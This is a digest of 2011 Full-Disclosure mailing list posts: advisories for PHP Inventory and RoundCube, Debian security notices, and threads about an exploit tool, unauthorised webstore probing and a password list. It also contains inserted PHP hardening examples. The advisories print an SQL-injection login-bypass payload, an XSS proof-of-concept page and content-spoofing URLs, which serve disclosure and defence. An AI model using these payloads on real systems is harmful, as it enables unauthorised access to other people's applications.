[Full-disclosure] PHP Inventory 1.3.1 Remote (Auth Bypass) SQL Injection Vulnerability
Advisory: PHP Inventory 1.3.1 Remote (Auth Bypass) SQL Injection Vulnerability
Advisory ID: INFOSERVE-ADV2011-08
Author: Stefan Schurtz
Contact: secur...@infoserve.de
Affected Software: Successfully tested on PHP Inventory 1.3.1
Vendor URL: http://www.phpwares.com/
Vendor Status: fixed
CVE-ID: CVE-2009-4595, CVE-2009-4596, CVE-2009-4597

== Vulnerability Description ==

PHP Inventory is (still) prone to a SQL-Injection (Auth Bypass) vulnerability

== PoC-Exploit ==

http://[target]/php-inventory/index.php

// with 'magic_quotes_gpc = Off'

USER NAME = ' or 1=1#

or

USER NAME = admin
PASSWORD = ' or 1=1#

== Solution ==

Update to the latest version 1.3.2

== Disclosure Timeline ==

29-Nov-2011 - informed vendor (contact form)
30-Nov-2011 - vendor fix

== Credits ==

Vulnerability found and advisory written by the INFOSERVE security team.

== References ==

http://www.infoserve.de/system/files/advisories/INFOSERVE-ADV2011-08.txt
http://www.exploit-db.com/exploits/10370/
http://secunia.com/advisories/37672/

Kind regards,
Stefan Schurtz | SECURE INFRASTRUCTURE
INFOSERVE GmbH | Am Felsbrunnen 15 | D-66119 Saarbrücken
Fon +49 (0)681 88008-52 | Fax +49 (0)681 88008-33 | s.schu...@infoserve.de | www.infoserve.de

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
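The pattern behind the advisory's auth bypass, shown as an added illustration (not PHP Inventory's own code): a login query built by string concatenation next to a prepared-statement version. It assumes a users(username, password) table, PDO with the pdo_sqlite extension for the demo rows, and password hashes stored with password_hash().

```php
<?php
// Added illustration, not PHP Inventory's own code: the string-built login
// query behind an auth-bypass SQL injection, next to a parameterised one.
// Assumptions: a users(username, password) table, PDO with the pdo_sqlite
// extension for the demo, and passwords stored as password_hash() output.

// How an unescaped input (magic_quotes_gpc = Off) rewrites a string-built query.
function build_vulnerable_query(string $user, string $pass): string
{
    return "SELECT * FROM users WHERE username='$user' AND password='$pass'";
}

// Vulnerable pattern: user-controlled text becomes part of the SQL grammar.
// Not executed in the demo below: SQLite does not treat '#' as a comment,
// MySQL (which PHP Inventory targets) does.
function login_vulnerable(PDO $db, string $user, string $pass): bool
{
    // With $pass = "' or 1=1#" the WHERE clause ends up as
    //   username='admin' AND password='' or 1=1#'
    // MySQL reads '#' as a comment start, so the trailing quote is ignored and
    // the condition is always true: any row satisfies it, no password needed.
    $row = $db->query(build_vulnerable_query($user, $pass))->fetch(PDO::FETCH_ASSOC);
    return $row !== false;
}

// Hardened pattern: a prepared statement binds the input as data, so it can
// never change the query's structure; the password is then checked against a
// stored hash instead of being matched as plaintext in the WHERE clause.
function login_hardened(PDO $db, string $user, string $pass): bool
{
    $stmt = $db->prepare('SELECT password FROM users WHERE username = ?');
    $stmt->execute([$user]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        return false;            // unknown user: same answer as a bad password
    }
    return password_verify($pass, $row['password']);
}

// Demo with the advisory's PoC values against constructed sample data.
echo build_vulnerable_query('admin', "' or 1=1#"), PHP_EOL;

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (username TEXT, password TEXT)');
$db->prepare('INSERT INTO users VALUES (?, ?)')
   ->execute(['admin', password_hash('correct-horse', PASSWORD_DEFAULT)]);

// The injected values are plain data to the prepared statement: no match.
var_dump(login_hardened($db, 'admin', "' or 1=1#"));
var_dump(login_hardened($db, "' or 1=1#", "' or 1=1#"));
// Only the real credential authenticates.
var_dump(login_hardened($db, 'admin', 'correct-horse'));
```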
[Full-disclosure] [SECURITY] [DSA 2354-1] cups security update
Debian Security Advisory DSA-2354-1                   secur...@debian.org
http://www.debian.org/security/                       Yves-Alexis Perez
November 28, 2011                            http://www.debian.org/security/faq

Package        : cups
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2011-2896 CVE-2011-3170

Petr Sklenar and Tomas Hoger discovered that missing input sanitising in the GIF decoder inside the Cups printing system could lead to denial of service or potentially arbitrary code execution through crafted GIF files.

For the oldstable distribution (lenny), this problem has been fixed in version 1.3.8-1+lenny10.

For the stable distribution (squeeze), this problem has been fixed in version 1.4.4-7+squeeze1.

For the testing and unstable distribution (sid), this problem has been fixed in version 1.5.0-8.

We recommend that you upgrade your cups packages.

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
[Full-disclosure] Client approach
Hi List,

I found some major design flaws and vulnerabilities on a local webstore, but now I would like to tell the owner nicely and maybe profit from it?!

Does anyone have some tips on how to inform a potential client of their vulnerabilities?

Thanks in advance,
Miguel Lopes
Re: [Full-disclosure] New FREE security tool!
Hmm, only a Windows installer, and no actual source code. Just who is getting exploited here I wonder?

On 11/30/2011 02:00 PM, full-disclosure-requ...@lists.grok.org.uk wrote:
> Hi, I'm afraid all the download links in that webpage seem to be broken, except for the Windows installer (which has a different version number than the rest of the downloads). Also, the github repository where you're hosting the source code appears to be empty.
>
> Cheers,
> -Mario

--
Samuel Lavitt
Senior Security Architect
+358-40-084-7257
SSH.com
Securing the path to your information assets
[Full-disclosure] New issue of PenTest Magazine - 21 pages of free content.
Hi everyone!

New issue of PenTest Magazine is out! 21 pages of free content, feat. full PainPill by Dean Bushmiller, where Dean talks about penetration testing business and law - this is a must for everyone in the business!

The link to download is below:
http://pentestmag.com/client-side-exploits-pentest-082011/

Just scroll down and click download for free!

Enjoy reading!

--
Maciej Kozuszek
PenTest Magazine
Managing Editor
Software Media Sp z o.o.
www.pentestmag.com
[Full-disclosure] Infosys TCS Wipro like companies don't know security basics?
Hi Security Experts,

I have a question about the security track record of Indian IT vendors like Infosys, TCS, Wipro etc. An article about Indian IT vendors by an ex-employee of one of these companies is circulating in the different NITs (National Institute of Technology) of India today. My doubt is about this part of the article from http://susam.in/blog/re-infosys-tcs-or-wipro/#engineers :

> Many claimed that I am wrong about the poor standard of training in Infosys, TCS, or Wipro. I must tell them that I have attended some of these training programmes. Among the many horror stories pertaining to training in these companies, I'll share only one with you to make my point. In the training assessments, the instructors set question papers containing problems with code that invokes undefined behaviour and ask you to predict its output. 'It invokes undefined behaviour' is not provided as an option you can select as the correct answer. Such training and knowledge is not only inaccurate but also very dangerous if you care about robustness and security of the software you create.

I am trying to verify this by using Secunia. I can find plenty of Microsoft and Google security vulnerabilities [http://secunia.com/advisories/search/?search=Microsoft+Google] but none for Infosys TCS or Wipro [http://secunia.com/advisories/search/?search=Infosys+TCS+Wipro]. What is the matter here? Indian software vendors are the best in the whole world in security matters or Secunia simply doesn't care about Indian software vendors?
Re: [Full-disclosure] New FREE security tool!
From one of the earlier emails to the list:

> Exploit Pack is an open source security framework developed by Juan Sacco. It combines the benefits of a...

On Wed, Nov 30, 2011 at 10:58 PM, Gino g...@1337.io wrote:
> Seems to have Juan Succo written all over it
>
> On 11/30/11 1:49 AM, Mario Vilas wrote:
>> Hi, I'm afraid all the download links in that webpage seem to be broken, except for the Windows installer (which has a different version number than the rest of the downloads). Also, the github repository where you're hosting the source code appears to be empty.
>>
>> Cheers,
>> -Mario
>>
>> On Wed, Nov 30, 2011 at 5:13 AM, nore...@exploitpack.com wrote:
>>> Exploit Pack is an open source security tool that will help you test the security of your computer or servers. It combines the benefits of a Java GUI, Python as engine and the latest exploits on the wild. It has an IDE to make the task of developing new exploits easier, Instant Search and XML-based modules. The latest release, version 1.1 is available for download right away!
>>>
>>> Take a look of the new features on this quick video: http://www.youtube.com/watch?v=DPX7JdvTRmg
>>>
>>> Download it directly from the main site: http://www.exploitpack.com
>>>
>>> We are looking for investors or donations to maintain this project alive!
>>>
>>> Thank you!
>>> The only one who has daily updates
>>> Exploit Pack
>>
>> --
>> "There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people."

--
Q. How many Prolog programmers does it take to change a lightbulb?
A. No.
Re: [Full-disclosure] New FREE security tool!
Indeed, Juan Sacco is the author. It's pretty clear from the about page on the site, and the whois record on the domain. I don't think it's meant to be a secret.

Now, I know his track record on this list is less than ideal, but let's try to be professional and wait for the source code to show up before criticizing it. :)

On Thu, Dec 1, 2011 at 5:11 AM, Stefan Edwards saedwards@gmail.com wrote:
> From one of the earlier emails to the list:
>
>> Exploit Pack is an open source security framework developed by Juan Sacco. It combines the benefits of a...
>
> On Wed, Nov 30, 2011 at 10:58 PM, Gino g...@1337.io wrote:
>> Seems to have Juan Succo written all over it
>
> --
> Q. How many Prolog programmers does it take to change a lightbulb?
> A. No.

--
"There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people."
Re: [Full-disclosure] Client approach
how not to do it:
http://www.securityweek.com/hungarian-man-pleads-guilty-hacking-marriott-systems-demanding-job-it-dept
http://www.infoworld.com/d/security-central/hungarian-man-charged-hacking-sony-ericsson-site-047

On Wed, Nov 30, 2011 at 11:56 AM, Miguel Lopes theoverb...@gmail.com wrote:
> Hi List,
>
> I found some major design flaws and vulnerabilities on a local webstore, but now I would like to tell the owner nicely and maybe profit from it?!
>
> Does anyone have some tips on how to inform a potential client of their vulnerabilities?
>
> Thanks in advance,
> Miguel Lopes

--
Ferenc Kovács
@Tyr43l - http://tyrael.hu
Re: [Full-disclosure] Infosys TCS Wipro like companies don't know security basics?
On Thu, 01 Dec 2011 07:24:14 +0530, Wonder Guy said:
> What is the matter here? Indian software vendors are the best in the whole world in security matters or Secunia simply doesn't care about Indian software vendors?

Secunia doesn't care about little fish no matter which pond they're in. If an Indian software vendor created a browser and shipped as many copies as IE or Firefox has shipped, I'm sure Secunia would show some hits.

Pick a few dozen Indian products that have shipped in fairly high volume. Then pick a similar sized sample of non-Indian products that shipped in similar volumes, and see what the expected number of Secunia entries would be for each sample.
Re: [Full-disclosure] New FREE security tool!
Everyone should remember that this software is made by the same people who make Insect Pro. Read into that what you will.

On Nov 30, 2011, at 7:49 AM, Samuel Lavitt samuel.lav...@ssh.com wrote:
> Hmm, only a Windows installer, and no actual source code. Just who is getting exploited here I wonder?
>
> On 11/30/2011 02:00 PM, full-disclosure-requ...@lists.grok.org.uk wrote:
>> Hi, I'm afraid all the download links in that webpage seem to be broken, except for the Windows installer (which has a different version number than the rest of the downloads). Also, the github repository where you're hosting the source code appears to be empty.
>>
>> Cheers,
>> -Mario
>
> --
> Samuel Lavitt
> Senior Security Architect
> +358-40-084-7257
> SSH.com
> Securing the path to your information assets
Re: [Full-disclosure] Client approach
You are in a tough spot. In general, the level of access you granted yourself in an unauthorized testing of the site would be considered illegal. You may recall the whole 'or 1=1 thing. So your approach to the client is all he would need to contact authorities if he so chose.

Arguably, the best thing to do here would be to contact the owner and just give them the information for free, and do so in a way that does not implicate you in any wrongdoing. Or simply drop it.

Moving forward, you might want to consider changing your business model so that you are hired to perform web app assessments before you start breaking laws.

t

-----Original Message-----
From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Miguel Lopes
Sent: Wednesday, November 30, 2011 2:56 AM
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] Client approach

Hi List,

I found some major design flaws and vulnerabilities on a local webstore, but now I would like to tell the owner nicely and maybe profit from it?!

Does anyone have some tips on how to inform a potential client of their vulnerabilities?

Thanks in advance,
Miguel Lopes
Re: [Full-disclosure] Client approach
Send site owner/admin anon email and leave it at that.. as Thor mentioned give em the info for free!
Re: [Full-disclosure] Infosys TCS Wipro like companies don't know security basics?
Wonder guy, the basis of your conclusion is as ridiculous as your question. Microsoft and Google are product companies. At least TCS and Wipro are not. They are into offshore and managed business domains. Infosys is also into making custom solutions and they are all closed source. And none of the companies that you mentioned cater to such a large audience as MS and Google do.

Are you going to start looking for every single company in Secunia and come up with such preposterous conclusions?

- Wonderguy
- TAS
http://twitter.com/p0wnsauc3

-----Original Message-----
From: Wonder Guy blrwonder...@gmail.com
Sender: full-disclosure-boun...@lists.grok.org.uk
Date: Thu, 1 Dec 2011 07:24:14
To: Full-Disclosure@lists.grok.org.uk
Subject: [Full-disclosure] Infosys TCS Wipro like companies don't know security basics?
[Full-disclosure] Large password list
I thought some of you may find this large password list useful, over 27 million entries.
http://dazzlepod.com/uniqpass/ (it's a paid list though, at $4.99)
Re: [Full-disclosure] Large password list
On 12/1/11 6:14 PM, Addy Yeow wrote:
> I thought some of you may find this large password list useful, over 27 million entries.
> http://dazzlepod.com/uniqpass/ (it's a paid list though, at $4.99)

Anyone linking a warez version (Why pay $4.99?) ?

-naif
Re: [Full-disclosure] New FREE security tool!
Hi!

I saw your message on FD and SF mailing list... So sorry for this.. But I didn't have the time to create the installer for win32, linux32/64

In fact.. I was playing my favourite MMORPG ( Lineage2 ) and they opened a new server yesterday so haha that kept me busy :p

Anyway, that's planned to be done tonight! When I get back home.. I'm at work right now :)

Also I have the latest version on my laptop so I will upload it to Git Repo from home too!

I will let you know when all of this is done!

Thank you and again, sorry for this misunderstanding!

and Oh! I created a blog to let the people know the status of this project, check it out: http://exploitpack.com/blog

Hope you like it!

Cheers
Jsacco

On 30.11.2011 06:49, Samuel Lavitt wrote:
> Hmm, only a Windows installer, and no actual source code. Just who is getting exploited here I wonder?
>
> On 11/30/2011 02:00 PM, full-disclosure-requ...@lists.grok.org.uk wrote:
>> Hi, I'm afraid all the download links in that webpage seem to be broken, except for the Windows installer (which has a different version number than the rest of the downloads). Also, the github repository where you're hosting the source code appears to be empty.
>>
>> Cheers,
>> -Mario
Re: [Full-disclosure] New FREE security tool!
dude, you're meant to be PRO, i also tried to use your git to pull the latest files, and nothing there mate. not since, a while ago... I also now have a copy of insectPRO, and am wondering, is your git able to update this for me.. am a little worried ;p

Although on exploitpack.com/downloads/ there seems to be some ...interesting files... i have not yet opened... but i hope it is good stuff!

On 2 December 2011 05:40, nore...@exploitpack.com wrote:
> Hi!
>
> I saw your message on FD and SF mailing list... So sorry for this.. But I didn't have the time to create the installer for win32, linux32/64
>
> In fact.. I was playing my favourite MMORPG ( Lineage2 ) and they opened a new server yesterday so haha that kept me busy :p
>
> Anyway, that's planned to be done tonight! When I get back home.. I'm at work right now :)
>
> Also I have the latest version on my laptop so I will upload it to Git Repo from home too!
>
> I will let you know when all of this is done!
>
> Thank you and again, sorry for this misunderstanding!
>
> and Oh! I created a blog to let the people know the status of this project, check it out: http://exploitpack.com/blog
>
> Hope you like it!
>
> Cheers
> Jsacco
Re: [Full-disclosure] Writing Self Modifying Code
On Wed, Nov 30, 2011 at 1:30 PM, Adam Behnke a...@infosecinstitute.com wrote:
> Hello full disclosureites, a new tutorial is available at InfoSec Institute ... Your thoughts?

who was this content plagiarized from?
[Full-disclosure] Multiple vulnerabilities in RoundCube
Hello list!

I want to warn you about multiple vulnerabilities in RoundCube. These are Brute Force, Content Spoofing, Cross-Site Scripting and Clickjacking vulnerabilities. CS and XSS are in TinyMCE, which is included with RoundCube.

-------------------------
Affected products:
-------------------------

Vulnerable are RoundCube 0.6 and previous versions (checked in 0.4-beta and 0.6). In the last version, RoundCube 0.6 uses moxieplayer.swf (instead of flv_player.swf). As the developers informed me, these vulnerabilities will be fixed in version RoundCube 0.7.

----------
Details:
----------

Brute Force (WASC-11):

http://site/index.php

Content Spoofing (WASC-12):

Swf-file of flvPlayer accepts arbitrary addresses in parameters flvToPlay and startImage, which allows to spoof content of flash - i.e. by setting addresses of video and/or image files from other site.

http://site/program/js/tiny_mce/plugins/media/img/flv_player.swf?flvToPlay=http://site2/1.flv
http://site/program/js/tiny_mce/plugins/media/img/flv_player.swf?autoStart=false&startImage=http://site2/1.jpg
http://site/program/js/tiny_mce/plugins/media/img/flv_player.swf?flvToPlay=http://site2/1.flv&autoStart=false&startImage=http://site2/1.jpg

Swf-file of flvPlayer accepts arbitrary addresses in parameter flvToPlay, which allows to spoof content of flash - i.e. by setting address of playlist file from other site (parameters thumbnail and url in xml-file accept arbitrary addresses).

http://site/program/js/tiny_mce/plugins/media/img/flv_player.swf?flvToPlay=http://site2/1.xml

File 1.xml:

<?xml version="1.0" encoding="UTF-8"?>
<playlist>
<item name="Content Spoofing" thumbnail="1.jpg" url="1.flv"/>
<item name="Content Spoofing" thumbnail="2.jpg" url="2.flv"/>
</playlist>

XSS (WASC-08):

If at the site at page with flv_player.swf (with parameter jsCallback=true, or if there is possibility to set this parameter for flv_player.swf) there is possibility to include JS code with function flvStart() and/or flvEnd() (via HTML Injection), then it's possible to conduct XSS attack. I.e. JS-callbacks can be used for XSS attack.

Example of exploit:

<html>
<body>
<script>
function flvStart() { alert('XSS'); }
function flvEnd() { alert('XSS'); }
</script>
<object width="50%" height="50%">
<param name="movie" value="flv_player.swf?flvToPlay=1.flv&jsCallback=true">
<param name="quality" value="high">
<embed src="flv_player.swf?flvToPlay=1.flv&jsCallback=true" width="50%" height="50%" quality="high" pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash"></embed>
</object>
</body>
</html>

Content Spoofing (WASC-12):

http://site/program/js/tiny_mce/plugins/media/moxieplayer.swf?url=1.flv

This swf-file accepts arbitrary addresses in parameter url, which allows to spoof content of flash - i.e. by setting address of video file from other site.

Clickjacking:

RoundCube is vulnerable to remote login using Clickjacking (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2011-October/008090.html). About such attacks I've already written in my article.

In version RoundCube 0.6-RC there was added protection against Clickjacking attack (except above-mentioned login form), to which all functionality of the application is vulnerable. But the method is not effective enough, because it works only in new versions of some browsers, so all users of older browsers are unprotected. And old versions of RoundCube are fully vulnerable to Clickjacking.

------------
Timeline:
------------

2011.10.15 - found vulnerabilities.
2011.10.18 - announced at my site.
2011.10.21 - informed developer of RoundCube. During my conversation with developer during October-November, he decided to fix them and was working on fixes for these holes.
2011.11.23 - developer of RoundCube informed that all fixes have been made and would be added to the next release RoundCube 0.7.
2011.11.30 - disclosed at my site.

I mentioned about these vulnerabilities at my site:
http://websecurity.com.ua/5448/

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
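The advisory notes that a header-only anti-framing protection leaves users of older browsers exposed and that the login form was left out of it. As an added illustration (not RoundCube's own code), here is the layered defence a login page can emit: the response header for browsers that honour it, plus legacy frame-busting markup for those that do not. Function names and the form action are assumed placeholders.

```php
<?php
// Added illustration, not RoundCube's own code: layered anti-framing for a
// login page. The response header covers browsers that honour it; the legacy
// frame-busting markup covers the older browsers the advisory says are left
// unprotected. Function names and the form action are assumed placeholders.

function send_antiframing_headers(): void
{
    // Honoured only by browsers that implement X-Frame-Options.
    header('X-Frame-Options: SAMEORIGIN');
    // Modern equivalent, also ignored by old browsers; harmless to send both.
    header("Content-Security-Policy: frame-ancestors 'self'");
}

function legacy_framebusting_markup(): string
{
    // Hide the body by default and reveal it only when the page is top-level.
    // A bare "top.location = self.location" can be neutralised by the framing
    // page, so the page stays blank in that case instead of being clickable.
    return <<<'HTML'
<style id="antiClickjack">body { display: none !important; }</style>
<script>
if (self === top) {
    var s = document.getElementById("antiClickjack");
    s.parentNode.removeChild(s);
} else {
    top.location = self.location;
}
</script>
HTML;
}

// Headers must go out before any body bytes.
send_antiframing_headers();
echo "<!DOCTYPE html>\n<html><head><title>Login</title>\n";
echo legacy_framebusting_markup(), "\n";
echo "</head><body>\n";
echo "<form method=\"post\" action=\"login.php\">\n";   // placeholder action
echo "  <input name=\"_user\"> <input name=\"_pass\" type=\"password\">\n";
echo "  <button type=\"submit\">Login</button>\n";
echo "</form>\n</body></html>\n";
```

The style/script pair has to appear in the document head before the form so that nothing clickable is rendered until the top-level check has passed.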
[Full-disclosure] [SECURITY] [DSA 2356-1] openjdk-6 security update
Debian Security Advisory DSA-2356-1                   secur...@debian.org
http://www.debian.org/security/                       Florian Weimer
December 01, 2011                            http://www.debian.org/security/faq

Package        : openjdk-6
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2011-3389 CVE-2011-3521 CVE-2011-3544 CVE-2011-3547 CVE-2011-3548 CVE-2011-3551 CVE-2011-3552 CVE-2011-3553 CVE-2011-3554 CVE-2011-3556 CVE-2011-3557 CVE-2011-3560

Several vulnerabilities have been discovered in OpenJDK, an implementation of the Java platform:

CVE-2011-3389
    The TLS implementation does not guard properly against certain chosen-plaintext attacks when block ciphers are used in CBC mode.

CVE-2011-3521
    The CORBA implementation contains a deserialization vulnerability in the IIOP implementation, allowing untrusted Java code (such as applets) to elevate its privileges.

CVE-2011-3544
    The Java scripting engine lacks necessary security manager checks, allowing untrusted Java code (such as applets) to elevate its privileges.

CVE-2011-3547
    The skip() method in java.io.InputStream uses a shared buffer, allowing untrusted Java code (such as applets) to access data that is skipped by other code.

CVE-2011-3548
    The java.awt.AWTKeyStroke class contains a flaw which allows untrusted Java code (such as applets) to elevate its privileges.

CVE-2011-3551
    The Java2D C code contains an integer overflow which results in a heap-based buffer overflow, potentially allowing untrusted Java code (such as applets) to elevate its privileges.

CVE-2011-3552
    Malicious Java code can use up an excessive amount of UDP ports, leading to a denial of service.

CVE-2011-3553
    JAX-WS enables stack traces for certain server responses by default, potentially leaking sensitive information.

CVE-2011-3554
    JAR files in pack200 format are not properly checked for errors, potentially leading to arbitrary code execution when unpacking crafted pack200 files.

CVE-2011-3556
    The RMI Registry server lacks access restrictions on certain methods, allowing a remote client to execute arbitrary code.

CVE-2011-3557
    The RMI Registry server fails to properly restrict privileges of untrusted Java code, allowing RMI clients to elevate their privileges on the RMI Registry server.

CVE-2011-3560
    The com.sun.net.ssl.HttpsURLConnection class does not perform proper security manager checks in the setSSLSocketFactory() method, allowing untrusted Java code to bypass security policy restrictions.

For the stable distribution (squeeze), this problem has been fixed in version 6b18-1.8.10-0+squeeze1.

For the testing distribution (wheezy) and the unstable distribution (sid), this problem has been fixed in version 6b23~pre11-1.

We recommend that you upgrade your openjdk-6 packages.

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
Re: [Full-disclosure] Is FD no longer unmoderated?
On Thu, Dec 1, 2011 at 3:06 AM, valdis.kletni...@vt.edu wrote:
> On Thu, 01 Dec 2011 07:49:28 +0530, David Blanc said:
>> A colleague of mine subscribed to FD recently and tried posting to it but every time he gets this message:
> The *list* isn't moderated. However, several *people* are, and they for the most part know who they are and why they're moderated.

Erm, in March 2010 John Cartwright (list owner) had to introduce a sort of moderation-lite procedure to deal with the way (it seemed that) n3td3v avoided his ban by just signing up new user IDs with which to spew his nonsense once his primary ID was banned. *New* users are now moderated for a while after their initial signup (not sure whether "a while" means time, or post-count), until they have shown they're not an idiot.

See http://seclists.org/fulldisclosure/2010/Mar/459

[Very good idea, IMHO, given the idiot factor that seems to show up here from time to time]

Cheers
Nick Boyce
--
Leave the Olympics in Greece, where they belong.
Re: [Full-disclosure] New FREE security tool!
I saw your site got defaced today, Mr "you're meant to be PRO". Maybe time for less posting and more edumacation?

On Thu, Dec 1, 2011 at 11:41 AM, xD 0x41 sec...@gmail.com wrote:
> dude, you're meant to be PRO,
[Full-disclosure] InfoSec Southwest 2012 CFP
InfoSec Southwest 2012 Call for Papers
March 30th through April 1st 2012, Austin, Texas
http://infosecsouthwest.com/cfp.html

The InfoSec Southwest staff are now soliciting papers to be presented at our 2012 conference to be held March 30th through April 1st 2012 in Austin, Texas.

Who Should Submit

InfoSec Southwest is intended to be a general security and hacking conference with no specific industry or topical focus. As such, nearly all topics (other than vendor pitches) are fair game and the attending audience is expected to span all demographics. Thus, we cordially invite anyone who has a paper to present to submit for inclusion in the conference.

Conference Format

InfoSec Southwest currently has two tracks slated for presentation. The first track is intended for traditional, full-length presentations and lectures. This is the track where lectures selected via the CFP process will be presented. The second track is modeled after our local AHA! (Austin Hackers Association) group's monthly meetings and is an open forum for first-come, first-served lightning and turbo talks.

Please see the conference website's CFP page for our submission procedure and speaker remuneration information: http://infosecsouthwest.com/cfp.html

Important Dates

2011.12.01: Call for Papers Opens
2011.01.01: Preferential First Round Speaker Selection Announced and Notifications Sent
2012.02.01: Call for Papers Deadline
2012.03.01: Final Speaker Selections Announced and Notifications Sent
2012.03.30: InfoSec Southwest 2012 Conference Registration and Reception
2012.03.31: InfoSec Southwest 2012 Conference Day 1
2012.04.01: InfoSec Southwest 2012 Conference Day 2

Thanks,
--
I)ruid, C²ISSP
dr...@caughq.org
http://druid.caughq.org
Re: [Full-disclosure] FreeBSD ftpd and ProFTPd on FreeBSD remote r00t exploit
On Wed, Nov 30, 2011 at 11:05:08PM +0100, HI-TECH . wrote:
> Hi lists,
> sorry if I offended anyone by referring to teso, I really like teso as you might also.
> all this happened because I was drunk hehe :>
> I hope you enjoy this release!
>
> On 30 November 2011 20:32, HI-TECH . isowarez.isowarez.isowa...@googlemail.com wrote:
>> /* KCOPE2011 - x86/amd64 bsd ftpd remote root exploit
>>  *
>>  * KINGCOPE CONFIDENTIAL - SOURCE MATERIALS
>>  *
>>  * This is unpublished proprietary source code of KINGCOPE Security.
>>  *
>>  * (C) COPYRIGHT KINGCOPE Security, 2011
>>  * All Rights Reserved
>>  *
>>  *
>>  * bug found by Kingcope
>>  * thanks to noone except alex whose damn down
>>  *
>>  * tested against: FreeBSD-8.2,8.1,7.2,7.1 i386;
>>  *                 FreeBSD-6.3 i386
>>  *                 FreeBSD-5.5,5.2 i386
>>  *                 FreeBSD-8.2 amd64
>>  *                 FreeBSD-7.3, 7.0 amd64
>>  *                 FreeBSD-6.4, 6.2 amd64
>>  *
>>  */
>>
>> I'm better than TESO 7350, see attached.
>> I ain't mad at cha and don't forget that the scene is fucked. and that the public scene is fucked too, kind of.
>> youse a down ass bitch and I ain't mad at cha.
>> thanks lsd you are the only one NORMAL.
>>
>> hear the track before you see the code: http://www.youtube.com/watch?v=krxu9_dRUwQ
>>
>> BTW my box (isowarez.de) got hacked so expect me in a zine :>
>>
>> /Signed the awesome Kingcope

Fun stuff... Thanks
Re: [Full-disclosure] Infosys TCS Wipro like companies don't know security basics?
Hi,

No offence, but I think you have a wrong perception of these companies. They are not into zero days!!! They are just vendor-specific support companies. You cannot expect a vendor-specific support company to find zero days and handle operations support both at the same time. Sorry buddy, that ain't possible. I am working with one of the ones you have mentioned; whatever vulnerabilities we identify are for our vendors, and we are not allowed by contractual agreement to publish identified vulnerabilities to the public domain. Secondly, if I am identifying some zero day, why would I share it on behalf of the company name?

Hope this clears your doubt about security basics.

thanks,

On Thu, Dec 1, 2011 at 7:24 AM, Wonder Guy blrwonder...@gmail.com wrote:
> Hi Security Experts,
>
> I have a question about the security track record of Indian IT vendors like Infosys, TCS, Wipro etc. An article about Indian IT vendors by an ex-employee of one of these companies is circulating in the different NITs (National Institute of Technology) of India today. My doubt is about this part of the article from http://susam.in/blog/re-infosys-tcs-or-wipro/#engineers :
>
> "Many claimed that I am wrong about the poor standard of training in Infosys, TCS, or Wipro. I must tell them that I have attended some of these training programmes. Among the many horror stories pertaining to training in these companies, I'll share only one with you to make my point. In the training assessments, the instructors set question papers containing problems with code that invokes undefined behaviour and ask you to predict its output. 'It invokes undefined behaviour' is not provided as an option you can select as the correct answer. Such training and knowledge is not only inaccurate but also very dangerous if you care about robustness and security of the software you create."
>
> I am trying to verify this by using Secunia. I can find plenty of Microsoft and Google security vulnerabilities [ http://secunia.com/advisories/search/?search=Microsoft+Google ] but none for Infosys TCS or Wipro [ http://secunia.com/advisories/search/?search=Infosys+TCS+Wipro ]. What is the matter here? Indian software vendors are the best in the whole world in security matters or Secunia simply doesn't care about Indian software vendors?
Re: [Full-disclosure] Client aproach
It was my first thought, letting them know in an anonymous e-mail, but getting some extra cash would be great too. I guess I will stick with sending the e-mail alerting them of the situation.

thanks

On 2011/12/01, at 16:55, Thor (Hammer of God) wrote:
> You are in a tough spot. In general, the level of access you granted yourself in an unauthorized testing of the site would be considered illegal. You may recall the whole 'or 1=1 thing. So your approach to the client is all he would need to contact authorities if he so chose. Arguably, the best thing to do here would be to contact the owner and just give them the information for free, and do so in a way that does not implicate you in any wrongdoing. Or simply drop it.
>
> Moving forward, you might want to consider changing your business model so that you are hired to perform web app assessments before you start breaking laws.
>
> t
>
> -Original Message-
> From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Miguel Lopes
> Sent: Wednesday, November 30, 2011 2:56 AM
> To: full-disclosure@lists.grok.org.uk
> Subject: [Full-disclosure] Client aproach
>
> Hi List,
>
> I found some major design flaws and vulnerabilities on a local webstore, but now I would like to tell the owner nicely and maybe profit from it?! Does anyone have some tips on how to inform a potential client of their vulnerabilities?
>
> Thanks in advance,
> Miguel Lopes
Re: [Full-disclosure] Client aproach
Thanks for the advice, the money was a long shot. I will stick with the anonymous e-mail, giving the information and tips to fix it.

On 2011/12/01, at 18:08, Chris L wrote:
> Depending on your country/local laws (no idea where you're from), how you discovered the vulnerabilities and if you actually tested them and gained unauthorized access in the process, there is the possibility you're on the wrong side of the law. If you haplessly stumbled across it and then left it be but just know it's there, you're probably safe. If you found something that seemed odd, and actively tried to test it or to verify that it was an issue without prior permission, you're almost certainly in violation of some law. Even if it was very minor verification.
>
> As well, a lot of whether or not the owner decides to get police involved and try to come after you is simply going to depend on their technological knowledge, how they perceive the information you tell them and simply whether or not they decide they like you, so it's a real crap shoot.
>
